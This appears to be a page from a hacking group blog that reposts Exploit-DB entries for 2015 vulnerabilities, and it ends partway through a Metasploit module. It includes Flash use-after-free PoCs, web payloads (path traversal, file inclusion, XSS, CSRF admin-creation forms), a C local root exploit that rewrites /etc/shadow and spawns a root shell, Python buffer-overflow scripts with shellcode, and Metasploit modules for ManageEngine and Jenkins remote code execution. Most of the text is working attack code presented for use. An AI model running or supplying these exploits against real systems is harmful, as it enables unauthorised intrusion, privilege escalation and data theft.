Source: https://code.google.com/p/google-security-research/issues/detail?id=559
There is a use-after-free in the TextField gridFitType setter. If it is set to an object with a toString method that frees the TextField, the property will be written after it is freed.
A PoC is as follows:
var toptf = this.createEmptyMovieClip("toptf", 1);
function func(){
toptf.removeMovieClip();
trace("here");
return "none";
}
var o = {toString : func};
var my_format:TextFormat = new TextFormat();
my_format.font = "Times-12";
var my_text1:TextField = toptf.createTextField("my_text1", toptf.getNextHighestDepth(), 9.5, 10, 400, 100);
my_text1.text = "this.gridFitType = none";
my_text1.embedFonts = true;
my_text1.antiAliasType = "advanced";
my_text1.gridFitType = o;
my_text1.setTextFormat(my_format);
var my_text2:TextField = toptf.createTextField("my_text2", toptf.getNextHighestDepth(), 9.5, 40, 400, 100);
my_text2.text = "this.gridFitType = advanced";
my_text2.embedFonts = true;
my_text2.antiAliasType = "advanced";
my_text2.gridFitType = "pixel";
my_text2.setTextFormat(my_format);
var my_text3:TextField = toptf.createTextField("my_text3", toptf.getNextHighestDepth(), 9.5, 70, 400, 100);
my_text3.text = "this.gridFitType = subpixel";
my_text3.embedFonts = true;
my_text3.antiAliasType = "advanced";
my_text3.gridFitType = "subpixel";
my_text3.setTextFormat(my_format);
A sample swf and fla are attached.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39020.zip
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863141457
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Source: https://code.google.com/p/google-security-research/issues/detail?id=557
There are a number of use-after-free vulnerabilities in MovieClip.beginGradientFill. If the spreadMethod or any other string parameter is an object with toString defined, this method can free the MovieClip, which is then used. Note that many parameters to this function can be used to execute script and free the MovieClip during execution, it is recommended that this issues be fixed with a stale pointer check.
A PoC is as follows:
this.createEmptyMovieClip("bmp_fill_mc", 1);
with (bmp_fill_mc) {
colors = [0xFF0000, 0x0000FF];
fillType = "radial"
alphas = [100, 100];
ratios = [0, 0xFF];
var o = {toString: func};
spreadMethod = o;
interpolationMethod = "linearRGB";
focalPointRatio = 0.9;
matrix = new Matrix();
matrix.createGradientBox(100, 100, Math.PI, 0, 0);
beginGradientFill(fillType, colors, alphas, ratios, matrix,
spreadMethod, interpolationMethod, focalPointRatio);
moveTo(100, 100);
lineTo(100, 300);
lineTo(300, 300);
lineTo(300, 100);
lineTo(100, 100);
endFill();
}
bmp_fill_mc._xscale = 200;
bmp_fill_mc._yscale = 200;
function func(){
trace("in func");
var test = thiz.createTextField("test", 1, 1, 1, 10, 10);
trace(test);
test.removeTextField();
return "reflect";
}
A sample swf and fla is attached.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39022.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=560
There is a use-after-free in the TextField antiAliasType setter. If it is set to an object with a toString method that frees the TextField, the property will be written after it is freed.
A PoC is as follows:
var toptf = this.createEmptyMovieClip("toptf", 1);
function func(){
toptf.removeMovieClip();
trace("here");
return "advanced";
}
var o = {toString : func};
var my_format:TextFormat = new TextFormat();
my_format.font = "Times-12";
var my_text1:TextField = toptf.createTextField("my_text1", toptf.getNextHighestDepth(), 9.5, 10, 400, 100);
my_text1.text = "this.gridFitType = none";
my_text1.embedFonts = true;
my_text1.antiAliasType = o;
my_text1.gridFitType = "none";
my_text1.setTextFormat(my_format);
var my_text2:TextField = toptf.createTextField("my_text2", toptf.getNextHighestDepth(), 9.5, 40, 400, 100);
my_text2.text = "this.gridFitType = advanced";
my_text2.embedFonts = true;
my_text2.antiAliasType = "advanced";
my_text2.gridFitType = "pixel";
my_text2.setTextFormat(my_format);
var my_text3:TextField = toptf.createTextField("my_text3", toptf.getNextHighestDepth(), 9.5, 70, 400, 100);
my_text3.text = "this.gridFitType = subpixel";
my_text3.embedFonts = true;
my_text3.antiAliasType = "advanced";
my_text3.gridFitType = "subpixel";
my_text3.setTextFormat(my_format);
A sample fla and swf are attached.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39019.zip
source: https://www.securityfocus.com/bid/64836/info
Oracle Supply Chain Products Suite is prone to a remote vulnerability in Oracle Demantra Demand Management.
The vulnerability can be exploited over the 'HTTP' protocol. The 'DM Others' sub component is affected.
Attackers can exploit this issue to obtain sensitive information.
This vulnerability affects the following supported versions:
12.2.0, 12.2.1, 12.2.2
POST /demantra/common/loginCheck.jsp/../../GraphServlet HTTP/1.1
Host: target.com:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
filename=C:/Program Files (x86)/Oracle Demantra Spectrum/Collaborator/demantra/WEB-INF/web.xml
source: https://www.securityfocus.com/bid/64788/info
The Almond Classifieds Component for Joomla is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
http://127.0.0.1/component/com_aclassfb/photos/
Advisory ID: HTB23282
Product: Zen Cart
Vendor: Zen Ventures, LLC
Vulnerable Version(s): 1.5.4
Tested Version: 1.5.4
Advisory Publication: November 25, 2015 [without technical details]
Vendor Notification: November 25, 2015
Vendor Patch: November 26, 2015
Public Disclosure: December 16, 2015
Vulnerability Type: PHP File Inclusion [CWE-98]
CVE Reference: CVE-2015-8352
Risk Level: Critical
CVSSv3 Base Score: 9.0 [CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered critical vulnerability in a popular e-commerce software Zen Cart, which can be exploited by remote non-authenticated attackers to compromise vulnerable system. A remote unauthenticated attacker might be able to execute arbitrary PHP code on the target system, run arbitrary system commands, gain complete access to application's database and obtain information of all website users.
The vulnerability exists due to absence of filtration of directory traversal sequences in "act" HTTP GET parameter in "/ajax.php" script, when including local PHP files using 'require()' PHP function. A remote unauthenticated attacker can include and execute arbitrary PHP code on the target system with privileges of the web server.
A simple exploit below will include file "/tmp/file.php" and execute its content:
http://[host]/ajax.php?method=1&act=/../../../../tmp/file
-----------------------------------------------------------------------------------------------
Solution:
Apply vendor's patch.
More Information:
https://www.zen-cart.com/showthread.php?218914-Security-Patches-for-v1-5-4-November-2015
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23282 - https://www.htbridge.com/advisory/HTB23282 - RCE in Zen Cart via Arbitrary File Inclusion
[2] Zen Cart - https://www.zen-cart.com/ - Zen Cart® truly is the art of e-commerce; free, user-friendly, open source shopping cart software.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
source: https://www.securityfocus.com/bid/64779/info
Atmail Webmail Server is prone to an HTML-injection vulnerability.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
Atmail 7.1.3 is vulnerable; others versions may also be affected.
<iframe width=0 height=0 src="javascript:alert('xss in main body')">
source: https://www.securityfocus.com/bid/64740/info
EZGenerator is prone to a local file-disclosure vulnerability and a cross-site request-forgery vulnerability.
An attacker may leverage these issues to perform unauthorized actions in the context of a logged-in user, or obtain sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
Local File Disclosure:
=====================
www.example.com/utils.php?action=download&filename=file.php%00
CSRF [Add Admin]:
================
<form method=.POST. name=.form0. action=.
http://www.example.com/centraladmin.php?process=processuser.>
<input type=.hidden. name=.flag. value=.add./>
<input type=.hidden. name=.old_username. value=."/>
<input type=.hidden. name=.username. value=.admin./>
<input type=.hidden. name=.name. value=.mm./>
<input type=.hidden. name=.sirname. value=.hh./>
<input type=.hidden. name=.email. value=.email@live.com./>
<input type=.hidden. name=.password. value=.12121212./>
<input type=.hidden. name=.repeatedpassword. value=.12121212./>
<input type=.hidden. name=.select_all. value=.yes./>
<input type=.hidden. name=.access_to_page47. value=.2./>
<input type=.hidden. name=.save. value=.Save./>
</form>
</body>
</html>
source: https://www.securityfocus.com/bid/64735/info
Built2Go PHP Shopping is prone to a cross-site request-forgery vulnerability.
Exploiting the issue will allow a remote attacker to use a victim's currently active session to change the victim's password. Successful exploits will compromise affected computers.
<form method=â?POSTâ? name=â?form0? action=â? http://www.example.com/adminpanel/edit_admin.phpâ?>
<input type=â?hiddenâ? name=â?useridâ? value=â?ADMINâ?/>
<input type=â?hiddenâ? name=â?passâ? value=â?12121212?/>
<input type=â?hiddenâ? name=â?retypepassâ? value=â?12121212?/>
<input type=â?hiddenâ? name=â?addnewâ? value=â?1?/>
<input type=â?hiddenâ? name=â?actionâ? value=â?saveâ?/>
<input type=â?hiddenâ? name=â?newâ? value=â?Submitâ?/>
</form>
/* == virtfshell ==
*
* Some distributions make virtfs-proxy-helper from QEMU either SUID or
* give it CAP_CHOWN fs capabilities. This is a terrible idea. While
* virtfs-proxy-helper makes some sort of flimsy check to make sure
* its socket path doesn't already exist, it is vulnerable to TOCTOU.
*
* This should spawn a root shell eventually on vulnerable systems.
*
* - zx2c4
* 2015-12-12
*
*
* zx2c4@thinkpad ~ $ lsb_release -i
* Distributor ID: Gentoo
* zx2c4@thinkpad ~ $ ./virtfshell
* == Virtfshell - by zx2c4 ==
* [+] Trying to win race, attempt 749
* [+] Chown'd /etc/shadow, elevating to root
* [+] Cleaning up
* [+] Spawning root shell
* thinkpad zx2c4 # whoami
* root
*
*/
#include <stdio.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/inotify.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
static int it_worked(void)
{
struct stat sbuf = { 0 };
stat("/etc/shadow", &sbuf);
return sbuf.st_uid == getuid() && sbuf.st_gid == getgid();
}
int main(int argc, char **argv)
{
int fd;
pid_t pid;
char uid[12], gid[12];
size_t attempts = 0;
sprintf(uid, "%d", getuid());
sprintf(gid, "%d", getgid());
printf("== Virtfshell - by zx2c4 ==\n");
printf("[+] Beginning race loop\n");
while (!it_worked()) {
printf("\033[1A\033[2K[+] Trying to win race, attempt %zu\n", ++attempts);
fd = inotify_init();
unlink("/tmp/virtfshell/sock");
mkdir("/tmp/virtfshell", 0777);
inotify_add_watch(fd, "/tmp/virtfshell", IN_CREATE);
pid = fork();
if (pid == -1)
continue;
if (!pid) {
close(0);
close(1);
close(2);
execlp("virtfs-proxy-helper", "virtfs-proxy-helper", "-n", "-p", "/tmp", "-u", uid, "-g", gid, "-s", "/tmp/virtfshell/sock", NULL);
_exit(1);
}
read(fd, 0, 0);
unlink("/tmp/virtfshell/sock");
symlink("/etc/shadow", "/tmp/virtfshell/sock");
close(fd);
kill(pid, SIGKILL);
wait(NULL);
}
printf("[+] Chown'd /etc/shadow, elevating to root\n");
system( "cp /etc/shadow /tmp/original_shadow;"
"sed 's/^root:.*/root::::::::/' /etc/shadow > /tmp/modified_shadow;"
"cat /tmp/modified_shadow > /etc/shadow;"
"su -c '"
" echo [+] Cleaning up;"
" cat /tmp/original_shadow > /etc/shadow;"
" chown root:root /etc/shadow;"
" rm /tmp/modified_shadow /tmp/original_shadow;"
" echo [+] Spawning root shell;"
" exec /bin/bash -i"
"'");
return 0;
}
source: https://www.securityfocus.com/bid/64734/info
UAEPD Shopping Cart Script is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
http://www.example.com/news.php?id=1
source: https://www.securityfocus.com/bid/64734/info
UAEPD Shopping Cart Script is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
http://www.example.com/products.php?cat_id=4
# Exploit Title: Easy File Sharing Web Server 7.2 - HEAD HTTP request SEH Buffer Overflow
# Date: 12/2/2015
# Exploit Author: ArminCyber
# Contact: Armin.Exploit@gmail.com
# Version: 7.2
# Tested on: XP SP3 EN
# category: Remote Exploit
# Usage: ./exploit.py ip port
import socket
import sys
host = str(sys.argv[1])
port = int(sys.argv[2])
a = socket.socket()
print "Connecting to: " + host + ":" + str(port)
a.connect((host,port))
entire=4500
# Junk
buff = "A"*4061
# Next SEH
buff+= "\xeb\x0A\x90\x90"
# pop pop ret
buff+= "\x98\x97\x01\x10"
buff+= "\x90"*19
# calc.exe
# Bad Characters: \x20 \x2f \x5c
shellcode = (
"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9"
"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56"
"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9"
"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97"
"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64"
"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8"
"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a"
"\x1c\x39\xbd"
)
buff+= shellcode
buff+= "\x90"*7
buff+= "A"*(4500-4061-4-4-20-len(shellcode)-20)
# HEAD
a.send("HEAD " + buff + " HTTP/1.0\r\n\r\n")
a.close()
print "Done..."
source: https://www.securityfocus.com/bid/64720/info
Dredge School Administration System is prone to the following security vulnerabilities:
1. An SQL-injection vulnerability
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An information-disclosure vulnerability
5. A security-bypass vulnerability
Exploiting these issues could allow an attacker to execute arbitrary script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, obtain sensitive information or bypass certain security restrictions to perform unauthorized actions.
Dredge School Administration System 1.0 is vulnerable; other versions may also be affected.
<html>
<title>Iphobos Blog</title>
<label><a href="http://www.example.com/DSM/loader.php?load=data export
send&tableid=3" class="button white">Export Accounts</a></label>
</html>
#!/usr/bin/python
#
################################################################################
#
# Title: IBM Tivoli Storage Manager FastBack Server 5.5.4.2
# _FXCLI_GetConfFileChunk Stack Buffer Overflow Vulnerability
# Date: 14 December 2015
# Author: Gianni Gnesa (gnix)
#
# Vendor Homepage: http://www.ibm.com/
# Software Name: IBM Tivoli Storage Manager FastBack
# Software Version: 5.5.4.2 (x86)
# Software Link: - Go to https://www-01.ibm.com/marketing/iwm/tnd/search.jsp?pn=Tivoli+Storage+Manager
# - Select "IBM Tivoli Storage Manager FastBack Try-and-Buy"
# (Version 5.5.4.2, Size: 120.7 MB)
#
# Tested on: Windows 7 Professional (x86)
#
################################################################################
#
# Vulnerability:
# ==============
#
# The vulnerability is a stack buffer overflow in the _FXCLI_GetConfFileChunk
# function caused by the insecure usage of _sscanf while parsing user-controlled
# input.
#
# .text:0057898E lea eax, [ebp+var_210]
# .text:00578994 push eax
# .text:00578995 lea ecx, [ebp+var_108]
# .text:0057899B push ecx
# .text:0057899C lea edx, [ebp+var_20C]
# .text:005789A2 push edx
# .text:005789A3 lea eax, [ebp+var_4]
# .text:005789A6 push eax
# .text:005789A7 lea ecx, [ebp+var_104] <=== Buffer that will be overwritten
# .text:005789AD push ecx
# .text:005789AE push offset $SG128635 ; "File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d"
# .text:005789B3 mov edx, [ebp+Src]
# .text:005789B6 push edx ; Src <=== Buffer under our control
# .text:005789B7 call _sscanf <=== Stack Buffer Overflow!!!
#
################################################################################
#
# Crash:
# ======
#
# (b44.9dc): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=01cd4fb8 ecx=01dacf8c edx=776870b4 esi=01cd4fb8 edi=00000000
# eip=41414141 esp=01dae328 ebp=41414141 iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
# 41414141 ?? ???
#
################################################################################
import sys
import time
import socket
from struct import pack
def create_pkt(opcode, p1="", p2="", p3=""):
# psAgentCommand (0x30 bytes)
buf = "\x44" * 0xC
buf+= pack("<L", opcode) # opcode
buf+= pack("<i", 0x0) # 1st memcpy: offset (in psCommandBuffer.data) for Src field
buf+= pack("<i", len(p1)) # 1st memcpy: size field
buf+= pack("<i", len(p1)) # 2nd memcpy: offset (in psCommandBuffer.data) for Src field
buf+= pack("<i", len(p2)) # 2nd memcpy: size field
buf+= pack("<i", len(p1) + len(p2)) # 3rd memcpy: offset (in psCommandBuffer.data) for Src field
buf+= pack("<i", len(p3)) # 3rd memcpy: size field
buf+= "\x44\x44\x44\x44"
buf+= "\x44\x44\x44\x44"
# psCommandBuffer
buf+= p1
buf+= p2
buf+= p3
# buf len - 4 because the packet length is not included
buf = pack(">i", len(buf)-4) + buf
return buf
def main():
if len(sys.argv) != 2:
print "Usage: %s <ip_address>\n" % sys.argv[0]
sys.exit(1)
server = sys.argv[1]
port = 11460
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((server, port))
pkt = create_pkt( opcode=0x531,
p1 = "File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % ("A"*10000,0,0,0,0),
p2 = "B" * 24000,
p3 = "C" * 24000 )
s.send(pkt)
s.close()
print "[+] Packet sent."
sys.exit(0)
if __name__ == "__main__":
main()
# Title: Ovidentia Module absences 2.64 Remote File Include Vulnerability
# Author: bd0rk
# eMail: bd0rk[at]hackermail.com
# Tested on: Ubuntu-Linux
# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Fabsences&file=absences-2-64.zip&idf=880
Proof-of-Concept:
/absences-2-64/programs/planning.php line 26
---------------------------------------------------------------
require_once $GLOBALS['babInstallPath'].'utilit/defines.php';
---------------------------------------------------------------
[+]Sploit: http://[target]/absences-2-64/programs/planning.php?GLOBALS[babInstallPath]=YOURSHELL.txt?
Description: The $GLOBALS['babInstallPath']-parameter isn't declared before require_once.
So an attacker can use this to execute some php-shellcode for example.
### The 27 years old, german hacker bd0rk ###
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'nokogiri'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => "ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability",
'Description' => %q{
This module exploits a vulnerability found in ManageEngine Desktop Central 9. When
uploading a 7z file, the FileUploadServlet class does not check the user-controlled
ConnectionId parameter in the FileUploadServlet class. This allows a remote attacker to
inject a null bye at the end of the value to create a malicious file with an arbitrary
file type, and then place it under a directory that allows server-side scripts to run,
which results in remote code execution under the context of SYSTEM.
Please note that by default, some ManageEngine Desktop Central versions run on port 8020,
but older ones run on port 8040. Also, using this exploit will leave debugging information
produced by FileUploadServlet in file rdslog0.txt.
This exploit was successfully tested on version 9, build 90109 and build 91084.
},
'License' => MSF_LICENSE,
'Author' => [ 'sinn3r' ],
'References' =>
[
[ 'URL', 'https://community.rapid7.com/community/infosec/blog/2015/12/14/r7-2015-22-manageengine-desktop-central-9-fileuploadservlet-connectionid-vulnerability-cve-2015-8249' ],
[ 'CVE', '2015-8249']
],
'Platform' => 'win',
'Targets' =>
[
[ 'ManageEngine Desktop Central 9 on Windows', {} ]
],
'Payload' =>
{
'BadChars' => "\x00"
},
'Privileged' => false,
'DisclosureDate' => "Dec 14 2015",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path for ManageEngine Desktop Central', '/']),
Opt::RPORT(8020)
], self.class)
end
def jsp_drop_bin(bin_data, output_file)
jspraw = %Q|<%@ page import="java.io.*" %>\n|
jspraw << %Q|<%\n|
jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n|
jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n|
jspraw << %Q|int numbytes = data.length();\n|
jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n|
jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n|
jspraw << %Q|{\n|
jspraw << %Q| char char1 = (char) data.charAt(counter);\n|
jspraw << %Q| char char2 = (char) data.charAt(counter + 1);\n|
jspraw << %Q| int comb = Character.digit(char1, 16) & 0xff;\n|
jspraw << %Q| comb <<= 4;\n|
jspraw << %Q| comb += Character.digit(char2, 16) & 0xff;\n|
jspraw << %Q| bytes[counter/2] = (byte)comb;\n|
jspraw << %Q|}\n|
jspraw << %Q|outputstream.write(bytes);\n|
jspraw << %Q|outputstream.close();\n|
jspraw << %Q|%>\n|
jspraw
end
def jsp_execute_command(command)
jspraw = %Q|<%@ page import="java.io.*" %>\n|
jspraw << %Q|<%\n|
jspraw << %Q|try {\n|
jspraw << %Q| Runtime.getRuntime().exec("chmod +x #{command}");\n|
jspraw << %Q|} catch (IOException ioe) { }\n|
jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n|
jspraw << %Q|%>\n|
jspraw
end
def get_jsp_stager
exe = generate_payload_exe(code: payload.encoded)
jsp_fname = "#{Rex::Text.rand_text_alpha(5)}.jsp"
# pwd: C:\ManageEngine\DesktopCentral_Server\bin
# targeted location: C:\ManageEngine\DesktopCentral_Server\webapps\DesktopCentral\jspf
register_files_for_cleanup("../webapps/DesktopCentral/jspf/#{jsp_fname}")
{
jsp_payload: jsp_drop_bin(exe, jsp_fname) + jsp_execute_command(jsp_fname),
jsp_name: jsp_fname
}
end
def get_build_number(res)
inputs = res.get_hidden_inputs
# The buildNum input is in the first form
inputs.first['buildNum']
end
def get_html_title(res)
html = res.body
n = ::Nokogiri::HTML(html)
n.at_xpath('//title').text
end
def check
uri = normalize_uri(target_uri.path, '/configurations.do')
res = send_request_cgi({
'method' => 'GET',
'uri' => uri
})
unless res
vprint_error("Connection timed out")
return Exploit::CheckCode::Unknown
end
build_number = get_build_number(res)
vprint_status("Found build number: #{build_number}")
html_title = get_html_title(res)
vprint_status("Found title: #{html_title}")
if build_number <= '91084'
return Exploit::CheckCode::Appears
elsif /ManageEngine Desktop Central/ === html_title
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Safe
end
def upload_jsp(stager_info)
# connectionId is part of the 7z filename
# computerName is part of the 7z filename (but will be used due to the null byte injection)
# customerId is used as a directory name
#
# The intended upload path is:
# C:\ManageEngine\DesktopCentral_Server\webapps\DesktopCentral\server-data\[customerId]\rds\scr-rec\null-computerName-connectionId.7z
# But this will upload to:
# C:\ManageEngine\DesktopCentral_Server\webapps\DesktopCentral\jspf
uri = normalize_uri(target_uri.path, 'fileupload')
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'ctype' => 'application/octet-stream',
'encode_params' => false,
'data' => stager_info[:jsp_payload],
'vars_get' => {
'connectionId' => "#{Rex::Text.rand_text_alpha(1)}/../../../../../jspf/#{stager_info[:jsp_name]}%00",
'resourceId' => Rex::Text.rand_text_alpha(1),
'action' => 'rds_file_upload',
'computerName' => Rex::Text.rand_text_alpha(rand(10)+5),
'customerId' => Rex::Text.rand_text_numeric(rand(10)+5)
}
})
if res.nil?
fail_with(Failure::Unknown, "Connection timed out while uploading to #{uri}")
elsif res && res.code != 200
fail_with(Failure::Unknown, "The server returned #{res.code}, but 200 was expected.")
end
end
def exec_jsp(stager_info)
uri = normalize_uri(target_uri.path, "/jspf/#{stager_info[:jsp_name]}")
res = send_request_cgi({
'method' => 'GET',
'uri' => uri
})
if res.nil?
fail_with(Failure::Unknown, "Connection timed out while executing #{uri}")
elsif res && res.code != 200
fail_with(Failure::Unknown, "Failed to execute #{uri}. Server returned #{res.code}")
end
end
def exploit
print_status("Creating JSP stager")
stager_info = get_jsp_stager
print_status("Uploading JSP stager #{stager_info[:jsp_name]}...")
upload_jsp(stager_info)
print_status("Executing stager...")
exec_jsp(stager_info)
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Jenkins CLI RMI Java Deserialization Vulnerability',
'Description' => %q{
This module exploits a vulnerability in Jenkins. An unsafe deserialization bug exists on
the Jenkins master, which allows remote arbitrary code execution. Authentication is not
required to exploit this vulnerability.
},
'Author' =>
[
'Christopher Frohoff', # Vulnerability discovery
'Steve Breen', # Public Exploit
'Dev Mohanty', # Metasploit module
'Louis Sato', # Metasploit
'William Vu', # Metasploit
'juan vazquez', # Metasploit
'Wei Chen' # Metasploit
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2015-8103'],
['URL', 'https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/jenkins.py'],
['URL', 'https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java'],
['URL', 'http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability'],
['URL', 'https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11']
],
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'Jenkins 1.637', {} ]
],
'DisclosureDate' => 'Nov 18 2015',
'DefaultTarget' => 0))
register_options([
OptString.new('TARGETURI', [true, 'The base path to Jenkins in order to find X-Jenkins-CLI-Port', '/']),
OptString.new('TEMP', [true, 'Folder to write the payload to', '/tmp']),
Opt::RPORT('8080')
], self.class)
end
def exploit
unless vulnerable?
fail_with(Failure::Unknown, "#{peer} - Jenkins is not vulnerable, aborting...")
end
invoke_remote_method(set_payload)
invoke_remote_method(class_load_payload)
end
# This is from the HttpClient mixin. But since this module isn't actually exploiting
# HTTP, the mixin isn't used in order to favor the Tcp mixin (to avoid datastore confusion &
# conflicts). We do need #target_uri and normlaize_uri to properly normalize the path though.
def target_uri
begin
# In case TARGETURI is empty, at least we default to '/'
u = datastore['TARGETURI']
u = "/" if u.nil? or u.empty?
URI(u)
rescue ::URI::InvalidURIError
print_error "Invalid URI: #{datastore['TARGETURI'].inspect}"
raise Msf::OptionValidateError.new(['TARGETURI'])
end
end
def normalize_uri(*strs)
new_str = strs * "/"
new_str = new_str.gsub!("//", "/") while new_str.index("//")
# Makes sure there's a starting slash
unless new_str[0,1] == '/'
new_str = '/' + new_str
end
new_str
end
def check
result = Exploit::CheckCode::Safe
begin
if vulnerable?
result = Exploit::CheckCode::Vulnerable
end
rescue Msf::Exploit::Failed => e
vprint_error(e.message)
return Exploit::CheckCode::Unknown
end
result
end
def vulnerable?
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path)
})
unless res
fail_with(Failure::Unknown, 'The connection timed out.')
end
http_headers = res.headers
unless http_headers['X-Jenkins-CLI-Port']
vprint_error('The server does not have the CLI port that is needed for exploitation.')
return false
end
if http_headers['X-Jenkins'] && http_headers['X-Jenkins'].to_f <= 1.637
@jenkins_cli_port = http_headers['X-Jenkins-CLI-Port'].to_i
return true
end
false
end
# Connects to the server, creates a request, sends the request,
# reads the response
#
# Passes +opts+ through directly to Rex::Proto::Http::Client#request_cgi.
#
def send_request_cgi(opts={}, timeout = 20)
if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0
actual_timeout = datastore['HttpClientTimeout']
else
actual_timeout = opts[:timeout] || timeout
end
begin
c = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'])
c.connect
r = c.request_cgi(opts)
c.send_recv(r, actual_timeout)
rescue ::Errno::EPIPE, ::Timeout::Error
nil
end
end
def invoke_remote_method(serialized_java_stream)
begin
socket = connect(true, {'RPORT' => @jenkins_cli_port})
print_status 'Sending headers...'
socket.put(read_bin_file('serialized_jenkins_header'))
vprint_status(socket.recv(1024))
vprint_status(socket.recv(1024))
encoded_payload0 = read_bin_file('serialized_payload_header')
encoded_payload1 = Rex::Text.encode_base64(serialized_java_stream)
encoded_payload2 = read_bin_file('serialized_payload_footer')
encoded_payload = "#{encoded_payload0}#{encoded_payload1}#{encoded_payload2}"
print_status "Sending payload length: #{encoded_payload.length}"
socket.put(encoded_payload)
ensure
disconnect(socket)
end
end
